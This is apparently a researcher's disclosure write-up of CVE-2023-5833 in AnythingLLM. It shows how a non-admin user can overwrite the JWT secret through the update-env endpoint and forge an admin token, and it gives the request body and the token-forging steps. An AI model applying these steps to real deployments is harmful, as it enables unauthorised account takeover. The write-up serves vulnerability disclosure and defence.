CVE-2023-5833 - Admin account TakeOver

Thu, 14 Sep 2023 00:00:00 +0000

📝 Description

The endpoint api/system/update-env allows any authenticated users to change env variables of the back-end process. We will abuse this functionnality to change JWT_SECRET env variable (which is used to sign the JWT token).

💥 Proof of Concept

Imagine the following list of accounts is used :

Login to the user (who is not admin) account and grab the jwt token in the localStorage (with the key : anythingllm_authToken )

The jwt token infos are (base64 decoded) :

{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "id": 2,
  "username": "user",
  "iat": 1694641865,
  "exp": 1697233865
}

Now go on Postman and send a POST request to http://localhost:3001/api/system/update-env with our JWT as Bearer token value and with the following json as body :

`1`	`{"JWTSecret":"admintakeover"}`

Now go to jwt.io and put the JWT token, change the id and username, sign the JWT with the secret admintakeover

Put this token in your localstorage and reload page, you should be admin (we can see i’m admin with the forged jwt token):

🖊️ références

You can find the report here and the CVE details here.

jwt on Raltheo

CVE-2023-5833 - Admin account TakeOver

📝 Description

💥 Proof of Concept

🖊️ références